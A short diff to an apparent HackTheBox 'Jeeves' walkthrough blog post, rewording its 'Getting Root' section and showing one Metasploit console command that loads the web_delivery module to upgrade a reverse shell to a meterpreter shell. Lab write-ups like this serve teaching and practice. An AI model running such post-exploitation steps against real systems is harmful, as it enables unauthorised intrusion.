1n4r1/1n4r1.github.io/_posts/2019-09-16-Hackthebox-Jeeves-Walkthrough.md

 ### 3. Getting Root

-We have reverse shell already.<br>
+For the further enumeration, gain meterpreter shell with Metasploit.<br>
-For the further enumeration, gain meterpreter shell with Metasploit module "Web_delivery".
+To achieve that purpose, we need to use Metasploit module "web_delivery" to generate a command.
 {% highlight shell %}
 msf5 > use exploit/multi/script/web_delivery